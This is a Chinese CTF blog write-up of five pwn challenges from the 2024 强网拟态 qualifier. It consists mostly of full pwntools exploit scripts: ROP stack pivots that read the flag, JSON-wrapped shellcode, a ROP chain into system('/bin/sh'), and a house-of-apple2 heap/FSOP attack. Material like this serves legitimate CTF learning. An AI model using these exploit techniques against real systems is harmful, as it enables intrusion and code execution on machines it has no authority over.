强网拟态初赛pwn部分wp

运气还行 进决赛了

PWN

signin

套了个随机数绕过的栈迁移

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
from pwn import *
from ctypes import *
from struct import pack
banary = "./vuln"
elf = ELF(banary)
libc = ELF("./libc.so.6")
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc1=cdll.LoadLibrary("./libc.so.6")
ip = ''
port = 0
local = 0
if local:
    io = process(banary)
else:
    io = remote("pwn-0e0144d48f.challenge.xctf.org.cn", 9999, ssl=True)

context(log_level = 'debug', os = 'linux', arch = 'amd64')
#context(log_level = 'debug', os = 'linux', arch = 'i386')

def dbg():
    gdb.attach(io)
    pause()

s = lambda data : io.send(data)
sl = lambda data : io.sendline(data)
sa = lambda text, data : io.sendafter(text, data)
sla = lambda text, data : io.sendlineafter(text, data)
r = lambda : io.recv()
ru = lambda text : io.recvuntil(text)
uu32 = lambda : u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))
uu64 = lambda : u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
iuu32 = lambda : int(io.recv(10),16)
iuu64 = lambda : int(io.recv(6),16)
uheap = lambda : u64(io.recv(6).ljust(8,b'\x00'))
lg = lambda data : io.success('%s -> 0x%x' % (data, eval(data)))
ia = lambda : io.interactive()

pop_rdi=0x0000000000401893
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
ret=0x000000000040101a
pop_rbp=0x000000000040127d
vuln=0x00000000004013C0
read_ptr=0x00000000004013CF
leave_ret=0x00000000004013be

payload=b'A'*0x12
s(payload)

libc1.srand(0x41414141)

for i in range(100):
    num=libc1.rand() %100 + 1 
    print(num)
    ru("Input the authentication code:")
    s(p64(num))

ru(">>")
sl(p32(1))
ru("Note:")
sl(b'youlin')

payload=b'A'*0x100+b'A'*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(vuln)
sl(payload)
io.recv()
libcbase=u64(io.recv(6).ljust(8,b'\x00'))-0x84420
lg("libcbase")
open=libcbase+libc.sym['open']
read=libcbase+libc.sym['read']
write=libcbase+libc.sym['write']
pop_rsi=libcbase+0x000000000002601f
pop_rdx=libcbase+0x0000000000142c92

payload=b'A'*0x100+p64(elf.bss(0x400)+0x100)+p64(read_ptr)
sl(payload)

orw=p64(pop_rdi)+p64(0x404538)+p64(pop_rsi)+p64(0)+p64(open)
orw+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(elf.bss(0x900))+p64(pop_rdx)+p64(0x50)+p64(read)
orw+=p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(elf.bss(0x900))+p64(pop_rdx)+p64(0x50)+p64(write)+b'flag\x00'

payload=orw+p64(pop_rbp)+p64(elf.bss(0xb48))+p64(read)
payload=payload.ljust(0x100,b'\x00')+p64(elf.bss(0x400)-0x8)+p64(leave_ret)
s(payload)


ia()

signin_revenge

和上面一题差不多,直接有栈迁移

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
from pwn import *
from ctypes import *
from struct import pack
banary = "./vuln"
elf = ELF(banary)
libc = ELF("./libc.so.6")
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
ip = ''
port = 0
local = 0
if local:
    io = process(banary)
else:
    io = remote("pwn-30cffcb888.challenge.xctf.org.cn", 9999, ssl=True)

context(log_level = 'debug', os = 'linux', arch = 'amd64')
#context(log_level = 'debug', os = 'linux', arch = 'i386')

def dbg():
    gdb.attach(io)
    pause()

s = lambda data : io.send(data)
sl = lambda data : io.sendline(data)
sa = lambda text, data : io.sendafter(text, data)
sla = lambda text, data : io.sendlineafter(text, data)
r = lambda : io.recv()
ru = lambda text : io.recvuntil(text)
uu32 = lambda : u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))
uu64 = lambda : u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
iuu32 = lambda : int(io.recv(10),16)
iuu64 = lambda : int(io.recv(6),16)
uheap = lambda : u64(io.recv(6).ljust(8,b'\x00'))
lg = lambda data : io.success('%s -> 0x%x' % (data, eval(data)))
ia = lambda : io.interactive()

pop_rdi=0x0000000000401393
ret=0x000000000040101a
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
vuln=0x00000000004012C0
leave_ret=0x00000000004012be
read_ptr=0x0000000004012CF
pop_rbp=0x000000000040117d

ru("lets move and pwn!")
payload=b'A'*0x100+b'A'*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(vuln)
sl(payload)
io.recv()
libcbase=u64(io.recv(6).ljust(8,b'\x00'))-0x84420
lg("libcbase")
open=libcbase+libc.sym['open']
read=libcbase+libc.sym['read']
write=libcbase+libc.sym['write']
pop_rsi=libcbase+0x000000000002601f
pop_rdx=libcbase+0x0000000000142c92

payload=b'A'*0x100+p64(elf.bss(0x400)+0x100)+p64(read_ptr)
sl(payload)

orw=p64(pop_rdi)+p64(0x4044f8)+p64(pop_rsi)+p64(0)+p64(open)
orw+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(elf.bss(0x900))+p64(pop_rdx)+p64(0x50)+p64(read)
orw+=p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(elf.bss(0x900))+p64(pop_rdx)+p64(0x50)+p64(write)+b'flag\x00'

payload=orw+p64(pop_rbp)+p64(elf.bss(0xb48))+p64(read)
payload=payload.ljust(0x100,b'\x00')+p64(elf.bss(0x400)-0x8)+p64(leave_ret)
s(payload)



ia()

ezcode

套了个json的短shellcode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
from pwn import *
from ctypes import *
from struct import pack
banary = "./vuln"
elf = ELF(banary)
# libc = ELF("./libc.so.6")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
ip = ''
port = 0
local = 1
if local:
    io = process(banary)
else:
    io = remote("pwn-ba1369d43c.challenge.xctf.org.cn", 9999, ssl=True)

context(log_level = 'debug', os = 'linux', arch = 'amd64')
#context(log_level = 'debug', os = 'linux', arch = 'i386')

def dbg():
    gdb.attach(io,"b *$rebase(0x00000000000018A6)")
    pause()

s = lambda data : io.send(data)
sl = lambda data : io.sendline(data)
sa = lambda text, data : io.sendafter(text, data)
sla = lambda text, data : io.sendlineafter(text, data)
r = lambda : io.recv()
ru = lambda text : io.recvuntil(text)
uu32 = lambda : u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))
uu64 = lambda : u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
iuu32 = lambda : int(io.recv(10),16)
iuu64 = lambda : int(io.recv(6),16)
uheap = lambda : u64(io.recv(6).ljust(8,b'\x00'))
lg = lambda data : io.success('%s -> 0x%x' % (data, eval(data)))
ia = lambda : io.interactive()

shellcode=b'c1e70c66ba070066b80a000f059931c089ce31ff0f05'
print(hex(len(shellcode)))
payload=b'{"shellcode":"'+shellcode+b'"}'
sl(payload)

shellcode = asm('''
    mov rdi,0x999800d
    xor esi,esi
    xor rdx,rdx
    xor rax,rax
    add rax,2
    syscall
    mov rdi,rax
    mov rsi,0x9998000+0x250
    add edx,0x100
    xor eax,eax
    syscall
    mov edi,1
    mov rsi,0x9998000+0x250
    mov rax,1
    syscall
    ''')
sl(b'flag\x00'.ljust(9,b'\x00')+shellcode)

ia()

qwen

套麻了,有溢出 抬下rsp然后执行rop,然后用pwn2复制一下flag到flag_read,就可以直接读flag_read读出flag了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
from pwn import *
from ctypes import *
from struct import pack
banary = "./pwn1"
elf = ELF(banary)
libc = ELF("./libc.so.6")
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
ip = ''
port = 0
local = 0
if local:
    io = process(banary)
else:
    io = remote("pwn-802264e403.challenge.xctf.org.cn", 9999, ssl=True)

context(log_level = 'debug', os = 'linux', arch = 'amd64')
#context(log_level = 'debug', os = 'linux', arch = 'i386')

def dbg():
    gdb.attach(io)
    pause()

s = lambda data : io.send(data)
sl = lambda data : io.sendline(data)
sa = lambda text, data : io.sendafter(text, data)
sla = lambda text, data : io.sendlineafter(text, data)
r = lambda : io.recv()
ru = lambda text : io.recvuntil(text)
uu32 = lambda : u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))
uu64 = lambda : u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
iuu32 = lambda : int(io.recv(10),16)
iuu64 = lambda : int(io.recv(6),16)
uheap = lambda : u64(io.recv(6).ljust(8,b'\x00'))
lg = lambda data : io.success('%s -> 0x%x' % (data, eval(data)))
ia = lambda : io.interactive()

libc1 = cdll.LoadLibrary('./libc.so.6')
num=libc1.rand()

for i in range(5):
    ru("请输入下棋的位置(行 列):")
    sl("0 "+str(i))
ru(b'want to say?')
s(b'a'*0x8+b'\x08\x15')

ru("Do you want to end the game [Y/N]\n")
sl("N")

ru(":")
sl("70 "+str(50))
ru(b'administrator key')
sl(str(num))

ru("logged in!\n")
sl("/proc/self/maps")
ru("as follows >>\n")
base=int(io.recv(12),16)
lg("base")
io.recvline()
io.recvline()
io.recvline()
libcbase = int(io.recv(12),16)
lg("libcbase")
system=libcbase+libc.sym['system']
bin_sh=libcbase+next(libc.search(b'/bin/sh\x00'))
pop_rdi=libcbase+0x000000000002164f
add_rsp=libcbase+0x0000000000154553#add rsp, 0x50 ; pop rbx ; pop rbp ; pop r12 ; ret

for i in range(10):
    io.recvline()

stack = int(io.recv(12),16) + 0x1E518
lg("stack")

for i in range(5):
    ru("请输入下棋的位置(行 列):")
    sl("0 "+str(i))

ru(b'want to say?')
payload=b'a'*0x8+p64(add_rsp)+p64(pop_rdi)+p64(pop_rdi) + p64(bin_sh) + p64(system)
s(payload)
ru("Do you want to end the game [Y/N]\n")
sl("N")
ru("请输入下棋的位置(行 列):")
sl("70 "+str(50))

# sl(b'cd /home/ctf')
# sl(b'./pwn2 -c flag_read flag')
# sleep(10)
# sl(b'cat flag_read')


ia()

屏幕截图 2024-10-19 215500

guest book

标准的菜单,2.35有uaf直接打apple2就可以了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
from pwn import *
from ctypes import *
from struct import pack
banary = "./pwn"
elf = ELF(banary)
libc = ELF("./libc.so.6")
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
ip = ''
port = 0
local = 0
if local:
    io = process(banary)
else:
    io = remote(ip,port)

context(log_level = 'debug', os = 'linux', arch = 'amd64')
#context(log_level = 'debug', os = 'linux', arch = 'i386')

def dbg():
    gdb.attach(io)
    pause()

s = lambda data : io.send(data)
sl = lambda data : io.sendline(data)
sa = lambda text, data : io.sendafter(text, data)
sla = lambda text, data : io.sendlineafter(text, data)
r = lambda : io.recv()
ru = lambda text : io.recvuntil(text)
uu32 = lambda : u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))
uu64 = lambda : u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
iuu32 = lambda : int(io.recv(10),16)
iuu64 = lambda : int(io.recv(6),16)
uheap = lambda : u64(io.recv(6).ljust(8,b'\x00'))
lg = lambda data : io.success('%s -> 0x%x' % (data, eval(data)))
ia = lambda : io.interactive()

def cmd(choice):
    ru(">")
    sl(str(choice))

def add(index,size):
    cmd(1)
    ru("[+] input your index")
    sl(str(index))
    ru("[+] input your size")
    sl(str(size))

def edit(index,content):
    cmd(2)
    ru("[+] input your index")
    sl(str(index))
    ru("[+] input your content")
    s(content)

def delete(index):
    cmd(3)
    ru("[+] input your index")
    sl(str(index))

def show(index):
    cmd(4)
    ru("[+] input your index")
    sl(str(index))


add(0,0x520)
add(1,0x500)
add(2,0x510)

delete(0)
add(3,0x560)
delete(2)

show(0)
io.recv()
libcbase=u64(io.recv(6).ljust(8,b'\x00'))-0x21b110
lg("libcbase")
one=[0x50a47,0xebc81,0xebc85,0xebc88,0xebce2,0xebd3f,0xebd43]
onegadget=libcbase+one[1]
l_next=libcbase+0x3fe890
rtld_global=libcbase+0x3fd040
system=libcbase+libc.sym['system']
bin_sh=libcbase+next(libc.search(b'/bin/sh\x00'))
setcontext=libcbase+libc.sym['setcontext']+61
_IO_list_all = libcbase + libc.sym['_IO_list_all']
ret=libcbase+0x0000000000029139
pop_rdi=libcbase+0x000000000002a3e5
lg("l_next")
lg("rtld_global")

edit(0,b'A'*0x10)
show(0)
ru(b'A'*0x10)
heapbase=uheap()-0x290
lg("heapbase")
edit(0,p64(libcbase+0x21b110)*2+p64(heapbase+0x290)+p64(_IO_list_all-0x20))


add(4,0x590)

fake_heap=heapbase+0x1200
IO_wfile_jumps = libcbase + 0x2170c0
lg("fake_heap")
fake_file = b''
fake_file = p64(0)+p64(1)
fake_file = fake_file.ljust(0x80,b'\x00')+p64(fake_heap)
fake_file = fake_file.ljust(0xb8,b'\x00')+p64(IO_wfile_jumps)
payload = cyclic(0x10)+fake_file
edit(2,payload)

payload = b''
payload = payload.ljust(0x58,b'\x00')+p64(setcontext)
payload = payload.ljust(0xa0,b'\x00')+p64(fake_heap+0xf0)+p64(ret)
payload = payload.ljust(0xc0,b'\x00')+p64(fake_heap)+p64(0)*3+p64(fake_heap-0x10)+p64(0)
payload +=p64(pop_rdi)+p64(bin_sh)+p64(system)
edit(3,payload)

cmd(5)
ia()
强网拟态初赛pwn部分wp
http://blogyoulin.top/2024/10/28/强网拟态/
Author
John Doe
Posted on
October 28, 2024
Licensed under